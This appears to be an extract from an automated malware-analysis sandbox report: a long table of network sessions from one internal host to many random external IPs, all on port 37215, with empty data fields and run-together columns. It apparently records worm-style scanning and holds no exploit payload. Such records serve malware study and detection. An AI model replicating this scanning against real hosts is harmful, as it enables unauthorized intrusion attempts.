                                                  13756192.168.2.1338040197.101.80.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13757192.168.2.134893641.150.74.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13758192.168.2.1345222124.190.198.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13759192.168.2.135139241.194.187.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13760192.168.2.135435841.20.59.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13761192.168.2.1352518197.66.85.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13762192.168.2.1345260157.86.154.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13763192.168.2.1335292157.102.78.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13764192.168.2.1358622157.129.111.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13765192.168.2.1335272197.249.200.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13766192.168.2.1334130197.224.55.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13767192.168.2.134732241.226.36.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13768192.168.2.134216641.35.56.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13769192.168.2.1342372207.22.240.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13770192.168.2.1343742157.0.212.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13771192.168.2.1339292157.186.227.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13772192.168.2.135756677.214.252.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13773192.168.2.1334664206.147.178.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13774192.168.2.133427241.165.104.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13775192.168.2.1349248197.175.227.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13776192.168.2.1338104157.164.30.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13777192.168.2.1347852157.136.252.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13778192.168.2.133995841.173.215.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13779192.168.2.133793841.86.99.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13780192.168.2.134507641.56.138.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13781192.168.2.1341126157.6.202.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13782192.168.2.1360126157.195.234.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13783192.168.2.134408641.225.137.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13784192.168.2.1357672100.5.0.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13785192.168.2.1334426197.217.5.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13786192.168.2.1352430157.223.68.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13787192.168.2.1344896197.102.32.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13788192.168.2.1346106197.159.22.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13789192.168.2.1334560157.90.20.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13790192.168.2.1345156114.221.142.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13791192.168.2.1357054197.58.58.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13792192.168.2.1340242157.183.157.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13793192.168.2.136012841.72.104.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13794192.168.2.1338648197.138.216.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13795192.168.2.1341018197.2.53.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13796192.168.2.1338992157.168.107.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13797192.168.2.1349824209.21.80.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13798192.168.2.1350544197.206.182.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13799192.168.2.1355300189.200.112.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13800192.168.2.1348568128.82.122.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13801192.168.2.135124431.197.21.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13802192.168.2.1346116149.181.130.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13803192.168.2.135307642.20.137.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13804192.168.2.1349716161.107.68.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13805192.168.2.1340174157.214.244.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13806192.168.2.1352338157.23.242.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13807192.168.2.1351390157.219.211.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13808192.168.2.1342738203.5.128.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13809192.168.2.1355940157.12.15.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13810192.168.2.1337470197.240.143.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13811192.168.2.1357762197.143.42.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13812192.168.2.135507241.131.186.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13813192.168.2.1354176197.237.161.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13814192.168.2.136091237.54.209.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13815192.168.2.1338160157.128.126.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13816192.168.2.1350772197.101.64.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13817192.168.2.133331892.42.152.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13818192.168.2.1358054197.122.246.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13819192.168.2.1343660157.233.111.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13820192.168.2.1344308161.212.157.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13821192.168.2.1340308157.96.211.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13822192.168.2.1345014197.8.181.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13823192.168.2.1359196197.95.152.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13824192.168.2.134007841.61.50.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13825192.168.2.1352538197.254.12.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13826192.168.2.1360460197.213.219.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13827192.168.2.1343768220.6.185.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13828192.168.2.133506241.131.230.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13829192.168.2.1350952205.145.157.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13830192.168.2.1343414131.94.214.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13831192.168.2.134174094.116.178.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13832192.168.2.1357864197.162.210.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13833192.168.2.1344272197.213.59.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13834192.168.2.135338241.141.142.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13835192.168.2.1343656157.101.242.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13836192.168.2.1345476160.221.146.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13837192.168.2.1335220210.253.55.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13838192.168.2.1337678198.204.237.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13839192.168.2.133958041.164.108.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13840192.168.2.1349060157.9.62.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13841192.168.2.134428841.225.21.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13842192.168.2.1347260157.81.222.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13843192.168.2.134581441.33.174.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13844192.168.2.1345598157.127.28.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13845192.168.2.1339958157.155.74.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13846192.168.2.1347024157.59.4.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13847192.168.2.1357010157.121.40.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13848192.168.2.1351916157.76.132.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13849192.168.2.1345210197.247.149.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13850192.168.2.136067241.190.175.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13851192.168.2.134011641.5.21.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13852192.168.2.135344041.44.57.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13853192.168.2.134608641.72.110.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13854192.168.2.1354896145.163.165.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13855192.168.2.1355572197.227.33.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13856192.168.2.1357544187.108.191.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13857192.168.2.134870241.237.217.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13858192.168.2.1342962116.182.129.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13859192.168.2.135761223.219.119.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13860192.168.2.1350754162.218.74.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13861192.168.2.1356432197.187.241.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13862192.168.2.134877841.205.159.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13863192.168.2.133522641.13.94.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13864192.168.2.1349334157.73.140.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13865192.168.2.133298820.101.255.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13866192.168.2.1358102157.25.90.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13867192.168.2.1348612157.234.231.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13868192.168.2.1357440176.58.42.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13869192.168.2.13582681.36.1.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13870192.168.2.133946841.154.153.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13871192.168.2.1341426220.180.74.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13872192.168.2.133639441.190.210.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13873192.168.2.1354922197.209.33.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13874192.168.2.1340556157.114.202.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13875192.168.2.13528322.26.209.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13876192.168.2.133340041.76.152.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13877192.168.2.1347142117.110.88.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13878192.168.2.1356538157.242.246.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13879192.168.2.134650241.49.87.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13880192.168.2.134547834.151.177.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13881192.168.2.1343610197.236.55.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13882192.168.2.1360310157.171.234.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13883192.168.2.134156241.54.237.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13884192.168.2.1339658197.144.95.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13885192.168.2.135833841.89.249.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13886192.168.2.1359872183.250.121.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13887192.168.2.1357736197.13.24.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13888192.168.2.1358416113.174.44.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13889192.168.2.1356672197.236.191.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13890192.168.2.1341616176.32.11.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13891192.168.2.135651688.83.9.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13892192.168.2.134245041.42.90.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13893192.168.2.135668441.215.50.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13894192.168.2.1349926146.185.251.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13895192.168.2.1334080157.71.177.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13896192.168.2.133908059.214.247.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13897192.168.2.1334914116.96.148.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13898192.168.2.133958044.33.32.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13899192.168.2.1359218197.77.196.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13900192.168.2.135809041.145.4.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13901192.168.2.1358776181.33.253.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13902192.168.2.135548841.220.235.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13903192.168.2.1338114197.208.37.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13904192.168.2.1355238183.126.215.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13905192.168.2.135478041.75.85.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13906192.168.2.1346112197.1.139.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13907192.168.2.134307841.201.249.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13908192.168.2.1345108197.166.147.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13909192.168.2.134299641.168.255.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13910192.168.2.1354814169.71.223.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13911192.168.2.133314272.69.175.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13912192.168.2.1354058197.29.111.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13913192.168.2.1360318197.30.0.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13914192.168.2.1351650197.93.113.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13915192.168.2.133942441.21.91.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13916192.168.2.1359132157.56.192.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13917192.168.2.135438441.119.18.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13918192.168.2.1334894157.192.197.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13919192.168.2.1354172124.204.75.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13920192.168.2.1351370197.139.225.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13921192.168.2.1360694157.24.67.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13922192.168.2.134628244.54.56.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13923192.168.2.134750041.231.13.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13924192.168.2.1340208157.191.102.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13925192.168.2.1358776197.233.253.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13926192.168.2.1334246166.56.205.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13927192.168.2.134117841.153.250.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13928192.168.2.1350430197.114.99.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13929192.168.2.1339402157.70.77.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13930192.168.2.1334554208.240.17.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13931192.168.2.135805841.174.150.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13932192.168.2.134899441.161.1.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13933192.168.2.1333526157.150.32.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13934192.168.2.133875837.216.226.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13935192.168.2.135527241.144.225.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13936192.168.2.133363441.64.236.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13937192.168.2.1344742197.50.15.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13938192.168.2.1360874203.204.210.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13939192.168.2.1348778157.127.134.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13940192.168.2.1357088157.79.94.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13941192.168.2.1344542157.2.57.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13942192.168.2.133674241.228.55.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13943192.168.2.1358146118.34.198.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13944192.168.2.1350356135.74.27.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13945192.168.2.133749641.35.29.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13946192.168.2.1337214157.254.231.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13947192.168.2.1357560197.91.253.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13948192.168.2.134246842.100.16.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13949192.168.2.134863283.138.240.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13950192.168.2.135182241.118.207.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13951192.168.2.134826641.83.20.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13952192.168.2.1338174157.76.183.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13953192.168.2.1360940157.164.144.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13954192.168.2.1344220197.93.234.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13955192.168.2.135116441.179.77.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13956192.168.2.134317441.19.129.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13957192.168.2.134353641.65.52.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13958192.168.2.135303041.1.61.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13959192.168.2.133616462.46.229.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13960192.168.2.1334004197.70.124.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13961192.168.2.1346594197.166.21.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13962192.168.2.1356104197.93.23.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13963192.168.2.1350356159.186.13.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13964192.168.2.134634639.81.40.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13965192.168.2.1351316220.27.187.25137215
